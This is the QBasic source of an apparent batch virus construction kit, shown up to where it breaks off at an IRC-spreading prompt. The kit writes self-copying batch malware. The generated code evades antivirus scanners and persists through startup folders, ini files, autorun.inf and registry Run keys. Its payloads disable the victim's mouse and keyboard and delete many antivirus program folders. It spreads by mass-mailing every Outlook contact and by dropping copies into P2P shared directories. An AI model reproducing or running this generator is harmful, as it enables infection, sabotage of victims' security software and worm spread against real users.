CLS
bvck$ = "Batch Virus Construction Kit 0.7"
RANDOMIZE TIMER
z = INT(RND * 26) + 97
az1$ = CHR$(z)
z = INT(RND * 26) + 97
az2$ = CHR$(z)
z = INT(RND * 26) + 97
az3$ = CHR$(z)
z = INT(RND * 26) + 97
az4$ = CHR$(z)
z = INT(RND * 26) + 97
az5$ = CHR$(z)
z = INT(RND * 26) + 97
az6$ = CHR$(z)
z = INT(RND * 26) + 97
az7$ = CHR$(z)
z = INT(RND * 26) + 97
az8$ = CHR$(z)
z$ = az1$ + az8$ + az4$ + az3$ + az7$ + az6$ + az5$ + az2$
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
COLOR 3
PRINT ""
PRINT ""
INPUT "   Name of author: ", author$
PRINT ""
INPUT "   Name of saved virus (filename.ext): ", vir$

a00:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Fooling AV`z"
PRINT "     дддддддддддд"
PRINT ""
PRINT ""
INPUT "     Want EICAR string ? (Y/N): ", eicar$
IF eicar$ = "Y" THEN GOTO a01
IF eicar$ = "y" THEN GOTO a01
INPUT "     Want 1000 fake bytes ? (Y/N): ", fakeb$
IF fakeb$ = "Y" THEN GOTO a02
IF fakeb$ = "y" THEN GOTO a02
GOTO a04

a01:
OPEN vir$ FOR OUTPUT AS #1
PRINT #1, "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
CLOSE #1
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Fooling AV`z"
PRINT "     дддддддддддд"
PRINT ""
PRINT ""
INPUT "     Want 1000 fake bytes ? (Y/N): ", fakeb$
IF fakeb$ = "Y" THEN GOTO a03
IF fakeb$ = "y" THEN GOTO a03
GOTO a04

a02:
OPEN vir$ FOR OUTPUT AS #1
q = 0
y0:
w = 0
DO WHILE w <= 97
z = INT(RND * 26) + 97
a$ = CHR$(z)
b$ = b$ + a$
w = w + 1
LOOP
w = 0
b$ = b$ + aa$
PRINT #1, b$
b$ = ""
q = q + 1
IF q <= 9 THEN GOTO y0
PRINT #1, "::"
PRINT #1, ":: Generated by "; bvck$; " [DvL]-[rRLF]"
PRINT #1, ":: Created by "; author$; " on "; DATE$; " at "; TIME$; ""
PRINT #1, "::"
PRINT #1, "@echo off"
PRINT #1, "@ver|find /i "; CHR$(34); "XP"; CHR$(34); "|if errorlevel 1 ctty nul|if not errorlevel 1 exit"
PRINT #1, "break off"
PRINT #1, "copy %0 %windir%\"; z$; ".bat>nul"
PRINT #1, "echo.on error resume next>%windir%\"; z$; ".vbs"
CLOSE #1
GOTO b01

a03:
OPEN vir$ FOR APPEND AS #1
q = 0
y1:
w = 0
DO WHILE w <= 97
z = INT(RND * 26) + 97
a$ = CHR$(z)
b$ = b$ + a$
w = w + 1
LOOP
w = 0
b$ = b$ + aa$
PRINT #1, b$
b$ = ""
q = q + 1
IF q <= 9 THEN GOTO y1
PRINT #1, "::"
PRINT #1, ":: Generated by "; bvck$; " [DvL]-[rRLF]"
PRINT #1, ":: Created by "; author$; " on "; DATE$; " at "; TIME$; ""
PRINT #1, "::"
PRINT #1, "@echo off"
PRINT #1, "@ver|find /i "; CHR$(34); "XP"; CHR$(34); "|if errorlevel 1 ctty nul|if not errorlevel 1 exit"
PRINT #1, "break off"
PRINT #1, "copy %0 %windir%\"; z$; ".bat>nul"
PRINT #1, "echo.on error resume next>%windir%\"; z$; ".vbs"
CLOSE #1
GOTO b01

a04:
OPEN vir$ FOR OUTPUT AS #1
PRINT #1, "::"
PRINT #1, ":: Generated by "; bvck$; " [DvL]-[rRLF]"
PRINT #1, ":: Created by "; author$; " on "; DATE$; " at "; TIME$; ""
PRINT #1, "::"
PRINT #1, "@echo off"
PRINT #1, "@ver|find /i "; CHR$(34); "XP"; CHR$(34); "|if errorlevel 1 ctty nul|if not errorlevel 1 exit"
PRINT #1, "break off"
PRINT #1, "copy %0 %windir%\"; z$; ".bat>nul"
PRINT #1, "echo.on error resume next>%windir%\"; z$; ".vbs"
CLOSE #1

b01:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Running options"
PRINT "     ддддддддддддддд"
PRINT ""
PRINT ""
PRINT "    1 - Run via STARTUP folder"
PRINT "    2 - Run via WIN.INI file"
PRINT "    3 - Run via SYSTEM.INI file"
PRINT "    4 - Run via AUTORUN.INF file"
PRINT "    5 - Run via REGISTRY keys"
PRINT "    6 - Run via AUTOEXEC.BAT file"
PRINT "    7 - Run via WINSTART.BAT file"
PRINT "    8 - Run via CONFIG.SYS file"
PRINT ""
PRINT ""
INPUT "    Your choice: ", bgn
IF bgn = 1 THEN GOTO a05
IF bgn = 2 THEN GOTO a06
IF bgn = 3 THEN GOTO a07
IF bgn = 4 THEN GOTO a08
IF bgn = 5 THEN GOTO b02
IF bgn = 6 THEN GOTO a09
IF bgn = 7 THEN GOTO a10
IF bgn = 8 THEN GOTO a10b
GOTO b01

a05:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.set "; az2$; ; az5$; "=wscript.createobject("; CHR$(34); "scripting.filesystemobject"; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.set "; az8$; ; az4$; "=wscript.createobject("; CHR$(34); "wscript.shell"; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo."; az3$; ; az1$; "="; az8$; ; az4$; ".SpecialFolders("; CHR$(34); "Startup"; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo."; az6$; ; az7$; "="; az8$; ; az4$; ".SpecialFolders("; CHR$(34); "AllUsersStartup"; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo."; az2$; ; az5$; ".copyfile "; CHR$(34); "%windir%\"; z$; ".bat"; CHR$(34); ", "; az3$; ; az1$; " & "; CHR$(34); "\"; z$; ".bat"; CHR$(34); ">>%windir%\"; z$; ".vbs"
PRINT #1, "echo."; az2$; ; az5$; ".copyfile "; CHR$(34); "%windir%\"; z$; ".bat"; CHR$(34); ", "; az6$; ; az7$; " & "; CHR$(34); "\"; z$; ".bat"; CHR$(34); ">>%windir%\"; z$; ".vbs"
PRINT #1, "copy %0 %windir%\startm~1\progra~1\autost~1\"; z$; ".bat>nul"
PRINT #1, "copy %0 %windir%\startm~1\programs\startup\"; z$; ".bat>nul"
PRINT #1, "copy %0 %windir%\alluse~1\startm~1\programs\startup\"; z$; ".bat>nul"
PRINT #1, "copy %0 %windir%\menЗin~1\progra~1\inicio\"; z$; ".bat>nul"
CLOSE #1
GOTO b03

a06:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "find /v /i "; CHR$(34); "[windows]"; CHR$(34); "<%windir%\win.ini>"; az3$; ""
PRINT #1, "find /v /i "; CHR$(34); "load="; CHR$(34); "<"; az3$; ">"; az4$; ""
PRINT #1, "find /v /i "; CHR$(34); "run="; CHR$(34); "<"; az4$; ">"; az3$; ""
PRINT #1, "find /v /i "; CHR$(34); "NullPort="; CHR$(34); "<"; az3$; ">"; az4$; ""
PRINT #1, "deltree/y "; az3$; ">nul"
PRINT #1, "echo.[windows]>%windir%\win.ini"
PRINT #1, "echo.load=%windir%\"; z$; ".bat>>%windir%\win.ini"
PRINT #1, "echo.run=>>%windir%\win.ini"
PRINT #1, "echo.NullPort=None>>%windir%\win.ini"
PRINT #1, "echo.>>%windir%\win.ini"
PRINT #1, "type "; az4$; ">>%windir%\win.ini"
PRINT #1, "deltree/y "; az4$; ">nul"
CLOSE #1
GOTO b03

a07:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "find /v /i "; CHR$(34); "[boot]"; CHR$(34); "<%windir%\system.ini>"; az3$; ""
PRINT #1, "find /v /i "; CHR$(34); "shell=explorer.exe"; CHR$(34); "<"; az3$; ">"; az1$; ""
PRINT #1, "deltree/y "; az3$; ">nul"
PRINT #1, "echo.[boot]>%windir%\system.ini"
PRINT #1, "echo.Shell=Explorer.exe %windir%\"; z$; ".bat>>%windir%\system.ini"
PRINT #1, "echo.>>%windir%\system.ini"
PRINT #1, "type "; az1$; ">>%windir%\system.ini"
PRINT #1, "deltree/y "; az1$; ">nul"
CLOSE #1
GOTO b03

a08:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.[AutoRun]>%windir%\"; z$; ".inf"
PRINT #1, "echo.open=%windir%\"; z$; ".bat>>%windir%\"; z$; ".inf"
PRINT #1, "for %%"; az8$; " in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%"; az8$; ":\nul copy %windir%\"; z$; ".inf %%"; az8$; ":\autorun.inf /y"
CLOSE #1
GOTO b03

a09:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.@call %windir%\"; z$; ".bat>>c:\autoexec.bat"
CLOSE #1
GOTO b03

a10:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.@call %windir%\"; z$; ".bat>%windir%\winstart.bat"
CLOSE #1
GOTO b03

a10b:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "copy %0 c:\"; z$; ".bat"
PRINT #1, "echo.shell=c:\command.com /e:20000 /k c:\"; z$; ".bat>>c:\config.sys"
CLOSE #1
GOTO b03

b02:
CLS
hk$ = "\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Registry startup"
PRINT "     дддддддддддддддд"
PRINT ""
PRINT ""
PRINT "    1 - Run             (LOCAL MACHINE)"
PRINT "    2 - Run-            (LOCAL MACHINE)"
PRINT "    3 - RunOnce         (LOCAL MACHINE)"
PRINT "    4 - RunServices     (LOCAL MACHINE)"
PRINT "    5 - RunServices-    (LOCAL MACHINE)"
PRINT "    6 - RunServicesOnce (LOCAL MACHINE)"
PRINT "    7 - Run             (CURRENT USER)"
PRINT "    8 - RunOnce         (CURRENT USER)"
PRINT "    9 - ActiveX Component"
PRINT ""
PRINT ""
INPUT "    Your choice: ", bgn
IF bgn = 1 THEN GOTO a11
IF bgn = 2 THEN GOTO a12
IF bgn = 3 THEN GOTO a13
IF bgn = 4 THEN GOTO a14
IF bgn = 5 THEN GOTO a15
IF bgn = 6 THEN GOTO a16
IF bgn = 7 THEN GOTO a17
IF bgn = 8 THEN GOTO a18
IF bgn = 9 THEN GOTO a18b
GOTO b02

a11:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; z$; ".reg"
PRINT #1, "echo.[HKLM"; hk$; "]>>%windir%\"; z$; ".reg"
CLOSE #1
GOTO a19

a12:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; z$; ".reg"
PRINT #1, "echo.[HKLM"; hk$; "-]>>%windir%\"; z$; ".reg"
CLOSE #1
GOTO a19

a13:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; z$; ".reg"
PRINT #1, "echo.[HKLM"; hk$; "Once]>>%windir%\"; z$; ".reg"
CLOSE #1
GOTO a19

a14:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; z$; ".reg"
PRINT #1, "echo.[HKLM"; hk$; "Services]>>%windir%\"; z$; ".reg"
CLOSE #1
GOTO a19

a15:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; z$; ".reg"
PRINT #1, "echo.[HKLM"; hk$; "Services-]>>%windir%\"; z$; ".reg"
CLOSE #1
GOTO a19

a16:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; z$; ".reg"
PRINT #1, "echo.[HKLM"; hk$; "ServicesOnce]>>%windir%\"; z$; ".reg"
CLOSE #1
GOTO a19

a17:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; z$; ".reg"
PRINT #1, "echo.[HKCU"; hk$; "]>>%windir%\"; z$; ".reg"
CLOSE #1
GOTO a19

a18b:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.set "; az3$; ; az1$; "=CreateObject("; CHR$(34); "wscript.shell"; CHR$(34); ")>%windir%\"; z$; ".vbs"
PRINT #1, "echo."; az3$; ; az1$; ".RegWrite "; CHR$(34); "HKLM\Software\Microsoft\Active Setup\Installed Components\KeyName\StubPath"; CHR$(34); ","; CHR$(34); "%windir%\"; z$; ".bat" ; CHR$(34); ">>%windir%\"; z$; ".vbs"
CLOSE #1
GOTO b03

a18:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo.REGEDIT4>%windir%\"; z$; ".reg"
PRINT #1, "echo.[HKCU"; hk$; "Once]>>%windir%\"; z$; ".reg"
CLOSE #1

a19:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "echo."; CHR$(34); ; az2; ; CHR$(34); "="; CHR$(34); "%windir%\"; z$; ".bat"; CHR$(34); ">>%windir%\"; z$; ".reg"
PRINT #1, "regedit /s %windir%\"; z$; ".reg"
CLOSE #1

b03:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Mouse & keyboard payloads"
PRINT "     ддддддддддддддддддддддддд"
PRINT ""
PRINT ""
INPUT "     Disable victims mouse ? (Y/N): ", dismouse$
IF dismouse$ = "Y" THEN GOTO a20
IF dismouse$ = "y" THEN GOTO a20
INPUT "     Disable victims keyboard ? (Y/N): ", diskeybrd$
IF diskeybrd$ = "Y" THEN GOTO a21
IF diskeybrd$ = "y" THEN GOTO a21
GOTO b04

a20:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "rundll32 mouse,disable"
CLOSE #1
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Mouse & keyboard payloads"
PRINT "     ддддддддддддддддддддддддд"
PRINT ""
PRINT ""
INPUT "     Disable victims keyboard ? (Y/N): ", diskeybrd$
IF diskeybrd$ = "Y" THEN GOTO a21
IF diskeybrd$ = "y" THEN GOTO a21
GOTO b04

a21:
OPEN vir$ FOR APPEND AS #1
PRINT #1, "rundll32 keyboard,disable"
CLOSE #1

b04:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Retro"
PRINT "     ддддд"
PRINT ""
PRINT ""
INPUT "     Delete AntiViruses ? (Y/N): ", retro$
IF retro$ = "Y" THEN GOTO a22
IF retro$ = "y" THEN GOTO a22
GOTO b05

a22:
w$ = az4$ + az6$ + az8$
OPEN vir$ FOR APPEND AS #1
PRINT #1, "set "; w$; "=deltree/y c:\"
PRINT #1, "%"; w$; "%antiba~1\>nul"
PRINT #1, "%"; w$; "%antiba~2\>nul"
PRINT #1, "%"; w$; "%antiba~1.1\>nul"
PRINT #1, "%"; w$; "%antiba~1.2\>nul"
PRINT #1, "%"; w$; "%antiba~1.3\>nul"
PRINT #1, "%"; w$; "%antiba~1.4\>nul"
PRINT #1, "%"; w$; "%antiba~1.5\>nul"
PRINT #1, "%"; w$; "%antiba~1.6\>nul"
PRINT #1, "%"; w$; "%antiba~1.7\>nul"
PRINT #1, "%"; w$; "%antiba~1.8\>nul"
PRINT #1, "%"; w$; "%antivi~1\>nul"
PRINT #1, "%"; w$; "%antivi~2\>nul"
PRINT #1, "%"; w$; "%antiviru\>nul"
PRINT #1, "%"; w$; "%avg\>nul"
PRINT #1, "%"; w$; "%avp\>nul"
PRINT #1, "%"; w$; "%avp30\>nul"
PRINT #1, "%"; w$; "%avx\>nul"
PRINT #1, "%"; w$; "%avpers~1\>nul"
PRINT #1, "%"; w$; "%bitdef~1\>nul"
PRINT #1, "%"; w$; "%bitdef~2\>nul"
PRINT #1, "%"; w$; "%comman~1\>nul"
PRINT #1, "%"; w$; "%cleancih\>nul"
PRINT #1, "%"; w$; "%esafen\>nul"
PRINT #1, "%"; w$; "%findvi~1\>nul"
PRINT #1, "%"; w$; "%f-macro\>nul"
PRINT #1, "%"; w$; "%f-prot\>nul"
PRINT #1, "%"; w$; "%f-prot95\>nul"
PRINT #1, "%"; w$; "%f-secu~1\>nul"
PRINT #1, "%"; w$; "%fwin\>nul"
PRINT #1, "%"; w$; "%fwin32\>nul"
PRINT #1, "%"; w$; "%inocul~1\>nul"
PRINT #1, "%"; w$; "%inocul~2\>nul"
PRINT #1, "%"; w$; "%kasper~1\>nul"
PRINT #1, "%"; w$; "%kasper~2\>nul"
PRINT #1, "%"; w$; "%mcafee\>nul"
PRINT #1, "%"; w$; "%mcafee~1\>nul"
PRINT #1, "%"; w$; "%msav\>nul"
PRINT #1, "%"; w$; "%norman\>nul"
PRINT #1, "%"; w$; "%norton~1\>nul"
PRINT #1, "%"; w$; "%norton~2\>nul"
PRINT #1, "%"; w$; "%pav\>nul"
PRINT #1, "%"; w$; "%pccill~1\>nul"
PRINT #1, "%"; w$; "%pc-cil~1\>nul"
PRINT #1, "%"; w$; "%rav\>nul"
PRINT #1, "%"; w$; "%softwin\>nul"
PRINT #1, "%"; w$; "%tbav\>nul"
PRINT #1, "%"; w$; "%tbavw95\>nul"
PRINT #1, "%"; w$; "%toolkit\>nul"
PRINT #1, "%"; w$; "%trendm~1\>nul"
PRINT #1, "%"; w$; "%trex\>nul"
PRINT #1, "%"; w$; "%virus\>nul"
PRINT #1, "%"; w$; "%vpc\>nul"
PRINT #1, "%"; w$; "%vs95\>nul"
PRINT #1, "%"; w$; "%zonela~1\>nul"
PRINT #1, "%"; w$; "%zonela~2\>nul"
PRINT #1, "set "; w$; "=deltree/y c:\progra~1\"
PRINT #1, "%"; w$; "%antiba~1\>nul"
PRINT #1, "%"; w$; "%antiba~2\>nul"
PRINT #1, "%"; w$; "%antiba~1.1\>nul"
PRINT #1, "%"; w$; "%antiba~1.2\>nul"
PRINT #1, "%"; w$; "%antiba~1.3\>nul"
PRINT #1, "%"; w$; "%antiba~1.4\>nul"
PRINT #1, "%"; w$; "%antiba~1.5\>nul"
PRINT #1, "%"; w$; "%antiba~1.6\>nul"
PRINT #1, "%"; w$; "%antiba~1.7\>nul"
PRINT #1, "%"; w$; "%antiba~1.8\>nul"
PRINT #1, "%"; w$; "%antivi~1\>nul"
PRINT #1, "%"; w$; "%antivi~2\>nul"
PRINT #1, "%"; w$; "%avg\>nul"
PRINT #1, "%"; w$; "%avp\>nul"
PRINT #1, "%"; w$; "%avx\>nul"
PRINT #1, "%"; w$; "%avx2000\>nul"
PRINT #1, "%"; w$; "%avpers~1\>nul"
PRINT #1, "%"; w$; "%bitdef~1\>nul"
PRINT #1, "%"; w$; "%bitdef~2\>nul"
PRINT #1, "%"; w$; "%comman~1\>nul"
PRINT #1, "%"; w$; "%common~1\avpsha~1\>nul"
PRINT #1, "%"; w$; "%common~1\symant~1\>nul"
PRINT #1, "%"; w$; "%datafe~1\>nul"
PRINT #1, "%"; w$; "%deerfi~1.com\>nul"
PRINT #1, "%"; w$; "%f-prot\>nul"
PRINT #1, "%"; w$; "%f-prot95\>nul"
PRINT #1, "%"; w$; "%findvi~1\>nul"
PRINT #1, "%"; w$; "%f-secu~1\>nul"
PRINT #1, "%"; w$; "%f-secure\>nul"
PRINT #1, "%"; w$; "%fsi\>nul"
PRINT #1, "%"; w$; "%fwin\>nul"
PRINT #1, "%"; w$; "%fwin32\>nul"
PRINT #1, "%"; w$; "%grisoft\>nul"
PRINT #1, "%"; w$; "%inocul~1\>nul"
PRINT #1, "%"; w$; "%inocul~2\>nul"
PRINT #1, "%"; w$; "%intern~2\>nul"
PRINT #1, "%"; w$; "%kasper~1\>nul"
PRINT #1, "%"; w$; "%kasper~2\>nul"
PRINT #1, "%"; w$; "%mcafee\>nul"
PRINT #1, "%"; w$; "%mcafee~1\>nul"
PRINT #1, "%"; w$; "%mindso~1\>nul"
PRINT #1, "%"; w$; "%norman\>nul"
PRINT #1, "%"; w$; "%norton~1\>nul"
PRINT #1, "%"; w$; "%norton~2\>nul"
PRINT #1, "%"; w$; "%pandas~1\>nul"
PRINT #1, "%"; w$; "%protec~1\>nul"
PRINT #1, "%"; w$; "%protec~2\>nul"
PRINT #1, "%"; w$; "%quickh~1\>nul"
PRINT #1, "%"; w$; "%rav\>nul"
PRINT #1, "%"; w$; "%signal9\>nul"
PRINT #1, "%"; w$; "%softwin\>nul"
PRINT #1, "%"; w$; "%spysto~1\>nul"
PRINT #1, "%"; w$; "%symant~1\>nul"
PRINT #1, "%"; w$; "%tbav\>nul"
PRINT #1, "%"; w$; "%tinype~1\>nul"
PRINT #1, "%"; w$; "%trendm~1\>nul"
PRINT #1, "%"; w$; "%trendp~1\>nul"
PRINT #1, "%"; w$; "%trojan~1\>nul"
PRINT #1, "%"; w$; "%trojan~2\>nul"
PRINT #1, "%"; w$; "%virusm~1.0\>nul"
PRINT #1, "%"; w$; "%zonela~1\>nul"
PRINT #1, "%"; w$; "%zonela~2\>nul"
PRINT #1, "set "; w$; "="
CLOSE #1

b05:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Internet spreading"
PRINT "     дддддддддддддддддд"
PRINT ""
PRINT ""
INPUT "     Spread via Outlook Express ? (Y/N): ", oes$
IF oes$ = "Y" THEN GOTO a23
IF oes$ = "y" THEN GOTO a23
INPUT "     Spread via P2P ? (Y/N): ", p2ps$
IF p2ps$ = "Y" THEN GOTO a24
IF p2ps$ = "y" THEN GOTO a24
INPUT "     Spread via mIRC, pIRCh, vIRC ? (Y/N): ", ircs$
IF ircs$ = "Y" THEN GOTO a26
IF ircs$ = "y" THEN GOTO a26
GOTO b06

a23:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Internet spreading"
PRINT "     дддддддддддддддддд"
PRINT ""
PRINT ""
PRINT "   # Outlook Express spreading"
PRINT ""
PRINT ""
INPUT "     --> Which subject ? ", oesubject$
PRINT ""
INPUT "     --> Which body ? ", oebody$
PRINT ""
INPUT "     --> Which attachment ? (filename.BAT): ", oeatach$
OPEN vir$ FOR APPEND AS #1
PRINT #1, "copy %0 c:\"; oeatach$; ">nul"
PRINT #1, "echo.set fso = "; CHR$(34); "Scripting.FileSystem.Object"; CHR$(34); ">>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Set so=CreateObject(fso)>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Set ol=CreateObject("; CHR$(34); "Outlook.Application"; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Set out=WScript.CreateObject("; CHR$(34); "Outlook.Application"; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Set mapi = out.GetNameSpace("; CHR$(34); "MAPI"; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Set a = mapi.AddressLists(1)>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Set ae=a.AddressEntries>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.For x=1 To ae.Count>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Set ci=ol.CreateItem(0)>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Set Mail=ci>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Mail.to=ol.GetNameSpace("; CHR$(34); "MAPI"; CHR$(34); ").AddressLists(1).AddressEntries(x)>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Mail.Subject="; CHR$(34); ; oesubject$; ; CHR$(34); ">>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Mail.Body="; CHR$(34); ; oebody$; ; CHR$(34); ">>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Mail.Attachments.Add("; CHR$(34); "C:\"; oeatach$; ; CHR$(34); ")>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Mail.send>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.Next>>%windir%\"; z$; ".vbs"
PRINT #1, "echo.ol.Quit>>%windir%\"; z$; ".vbs"
CLOSE #1
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Internet spreading"
PRINT "     дддддддддддддддддд"
PRINT ""
PRINT ""
INPUT "     Spread via P2P ? (Y/N): ", p2ps$
IF p2ps$ = "Y" THEN GOTO a24
IF p2ps$ = "y" THEN GOTO a24
GOTO a25

a24:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Internet spreading"
PRINT "     дддддддддддддддддд"
PRINT ""
PRINT ""
PRINT "   # Pear-to-pear spreading"
PRINT ""
PRINT ""
INPUT "     --> Which attachment ? (filename.BAT): ", p2patach$
OPEN vir$ FOR APPEND AS #1
PRINT #1, "copy %0 c:\kazaa\myshar~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\mydown~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\mydocu~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\eigene~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\applej~1\incoming\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\bearsh~1\shared\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\edonke~1\incoming\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\emule\incoming\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\grokster\mygrok~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\icq\shared~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\kazaa\myshar~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\kazaal~1\myshar~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\kmd\myshar~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\limewire\shared\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\morpheus\myshar~1\"; p2patach$; ">nul"
PRINT #1, "copy %0 c:\progra~1\overnet\bundles\"; p2patach$; ">nul"
CLOSE #1

a25:
CLS
COLOR 2
PRINT ""
PRINT ""
PRINT ""
PRINT "                идддддддддддддддддддддддддддддддддддддддддддддддддд╩"
PRINT "                Ё ╟╠╡ш "; bvck$; " [DvL] ш╡╠╟ Ё"
PRINT "                хдддддддддддддддддддддддддддддддддддддддддддддддддд╪"
PRINT ""
PRINT ""
COLOR 3
PRINT "     Internet spreading"
PRINT "     дддддддддддддддддд"
PRINT ""
PRINT ""
INPUT "     Spread via mIRC, pIRCh, vIRC ? (Y/N): ", ircs$
IF ircs$ = "Y" THEN GOTO a26
